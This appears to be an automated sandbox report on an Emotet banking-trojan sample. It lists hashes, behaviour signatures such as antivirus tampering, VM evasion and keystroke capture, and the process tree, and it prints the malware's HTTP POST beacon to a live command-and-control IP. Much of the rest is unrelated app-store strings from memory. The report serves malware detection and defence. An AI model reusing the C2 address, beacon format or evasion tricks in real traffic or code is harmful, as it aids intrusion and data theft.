
Analysis Report SecuriteInfo.com.Trojan.DownLoader34.14035.3447.5325

Overview

General Information

Sample Name:SecuriteInfo.com.Trojan.DownLoader34.14035.3447.5325 (renamed file extension from 5325 to exe)
Analysis ID:255739
MD5:49767b7b931392f1d8cce39dc73f443c
SHA1:bce82b52b2db7bba32ee6329cb0d112de662e380
SHA256:b0bfcebf38da28e3b2f79c5fce62bf91f5c62efe5399a63069493cb9a2b8c418

Most interesting Screenshot:

Detection

Emotet
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Emotet
Changes security center settings (notifications, updates, antivirus, firewall)
Drops executables to the windows directory (C:\Windows) and starts them
Hides that the sample has been downloaded from the Internet (zone.identifier)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to read the PEB
Creates a DirectInput object (often for capturing keystrokes)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files to the windows directory (C:\Windows)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • svchost.exe (PID: 7124 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1388 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2540 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 6268 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 6276 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 6372 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 6336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6740 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7100 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6404 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6064 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2904 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000002.248081066.0000000000C41000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000001.00000002.516683693.0000000000AA0000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000000.00000002.247934419.0000000000610000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000001.00000002.516869836.0000000000AB1000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |

Sigma Overview

No Sigma rule has matched

Signature Overview

Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exe | Code function: 1_2_00AB1D9C CryptDecodeObjectEx,1_2_00AB1D9C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe | Code function: 0_2_00405DE0 FindFirstFileA,CloseHandle,0_2_00405DE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe | Code function: 0_2_004051E0 #535,#5710,_mbscmp,_mbscmp,#800,#941,#941,FindFirstFileA,#800,#800,SendMessageA,#537,_mbscmp,_mbscmp,#4000,#535,#5710,_mbscmp,#800,#941,#941,#800,#800,FindNextFileA,FindClose,#800,#800,0_2_004051E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe | Code function: 0_2_00406240 _mbscmp,#535,_mbscmp,#5710,_mbscmp,_mbscmp,#800,#941,#941,FindFirstFileA,FindNextFileA,#537,_mbscmp,_mbscmp,#800,FindNextFileA,FindClose,#800,0_2_00406240
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe | Code function: 0_2_00405F40 #535,#5710,_mbscmp,_mbscmp,#800,#941,#941,FindFirstFileA,#800,#1168,#1669,SendMessageA,#537,_mbscmp,_mbscmp,#4000,#535,#5710,_mbscmp,#800,#941,#941,#800,#800,FindNextFileA,FindClose,#1168,#2652,#800,0_2_00405F40
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe | Code function: 0_2_00C428BC FindNextFileW,FindFirstFileW,FindClose,0_2_00C428BC
Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exe | Code function: 1_2_00405DE0 FindFirstFileA,CloseHandle,1_2_00405DE0
Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exe | Code function: 1_2_004051E0 #535,#5710,_mbscmp,_mbscmp,#800,#941,#941,FindFirstFileA,#800,#800,SendMessageA,#537,_mbscmp,_mbscmp,#4000,#535,#5710,_mbscmp,#800,#941,#941,#800,#800,FindNextFileA,FindClose,#800,#800,1_2_004051E0
Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exe | Code function: 1_2_00406240 _mbscmp,#535,_mbscmp,#5710,_mbscmp,_mbscmp,#800,#941,#941,FindFirstFileA,FindNextFileA,#537,_mbscmp,_mbscmp,#800,FindNextFileA,FindClose,#800,1_2_00406240
Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exe | Code function: 1_2_00405F40 #535,#5710,_mbscmp,_mbscmp,#800,#941,#941,FindFirstFileA,#800,#1168,#1669,SendMessageA,#537,_mbscmp,_mbscmp,#4000,#535,#5710,_mbscmp,#800,#941,#941,#800,#800,FindNextFileA,FindClose,#1168,#2652,#800,1_2_00405F40
Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exe | Code function: 1_2_00AB28BC FindNextFileW,FindFirstFileW,FindClose,1_2_00AB28BC

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2404334 ET CNC Feodo Tracker Reported CnC Server TCP group 18 192.168.2.3:49725 -> 47.146.117.214:80
Source: global traffic | HTTP traffic detected:
POST /EiNjgf2bWQ/oQ1qYoC1f28ZhMF2/Hpfhb9sn/m3L3O680Wtk/CBtZ1LyTyBYp5cFLU/ HTTP/1.1
Referer: http://47.146.117.214/EiNjgf2bWQ/oQ1qYoC1f28ZhMF2/Hpfhb9sn/m3L3O680Wtk/CBtZ1LyTyBYp5cFLU/
Content-Type: multipart/form-data; boundary=---------------------------009576963303513
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 47.146.117.214
Content-Length: 4564
Connection: Keep-Alive
Cache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 47.146.117.214
Source: svchost.exe, 00000018.00000003.483972698.000001C21DF59000.00000004.00000001.sdmp | String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.facebook.com (Facebook)
Source: svchost.exe, 00000018.00000003.483972698.000001C21DF59000.00000004.00000001.sdmp | String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.twitter.com (Twitter)
Source: svchost.exe, 00000018.00000003.483865854.000001C21DF72000.00000004.00000001.sdmp | String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF"},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2020-07-27T07:14:35.6749414Z||.||121f780f-ffc5-478c-bf53-6b53ed02cb1e||1152921505690835751||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku":{"LastModifiedDate":"2020-07-27T07:13:24.2771771Z","LocalizedProperties":[{"SkuDescript
Source: svchost.exe, 00000018.00000003.483844329.000001C21DF6A000.00000004.00000001.sdmp | String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","dT equals www.facebook.com (Facebook)
Source: svchost.exe, 00000018.00000003.483844329.000001C21DF6A000.00000004.00000001.sdmp | String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","dT equals www.twitter.com (Twitter)
Source: svchost.exe, 00000018.00000003.479078515.000001C21DF5C000.00000004.00000001.sdmp | String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"murder game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1"},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Game","Validatio
Source: svchost.exe, 00000018.00000003.479101603.000001C21DF46000.00000004.00000001.sdmp | String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":423919743,"PackageFormat":"EAppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.36.3600.70_neutral_~_ytsefhwckbdv6","PackageId":"f29b0636-abdc-7df5-2edc-8f3e01650a1f-X86","PackageRank":30011,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Xbox"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.36.3600.70_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.36.3600.70_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"platf
          Source: svchost.exe, 00000018.00000003.479027196.000001C21DFBE000.00000004.00000001.sdmpString found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"murder game journey 
","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"
          Source: unknown | HTTP traffic detected:
          POST /EiNjgf2bWQ/oQ1qYoC1f28ZhMF2/Hpfhb9sn/m3L3O680Wtk/CBtZ1LyTyBYp5cFLU/ HTTP/1.1
          Referer: http://47.146.117.214/EiNjgf2bWQ/oQ1qYoC1f28ZhMF2/Hpfhb9sn/m3L3O680Wtk/CBtZ1LyTyBYp5cFLU/
          Content-Type: multipart/form-data; boundary=---------------------------009576963303513
          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
          Host: 47.146.117.214
          Content-Length: 4564
          Connection: Keep-Alive
          Cache-Control: no-cache
          Source: KBDGAE.exe, 00000001.00000002.519840583.00000000028B2000.00000004.00000001.sdmp | String found in binary or memory: http://47.146.117.214/EiNjgf2bWQ/oQ1qYoC1f28ZhMF2/Hpfhb9sn/m3L3O680Wtk/CBtZ1LyTyBYp5cFLU/
          Source: svchost.exe, 00000018.00000002.495528806.000001C21D6E7000.00000004.00000001.sdmp | String found in binary or memory: http://crl.mic8
          Source: svchost.exe, 00000002.00000002.519669425.000001AA3DC15000.00000004.00000001.sdmp, svchost.exe, 00000018.00000002.495678160.000001C21DF1F000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
          Source: svchost.exe, 00000002.00000002.519669425.000001AA3DC15000.00000004.00000001.sdmp, svchost.exe, 00000018.00000002.495678160.000001C21DF1F000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
          Source: svchost.exe, 00000002.00000002.519669425.000001AA3DC15000.00000004.00000001.sdmp, svchost.exe, 00000018.00000002.495678160.000001C21DF1F000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.msocsp.com0
          Source: svchost.exe, 00000002.00000002.519852130.000001AA3DE00000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: svchost.exe, 00000005.00000002.306628960.000001ED2A813000.00000004.00000001.sdmp | String found in binary or memory: http://www.bingmapsportal.com
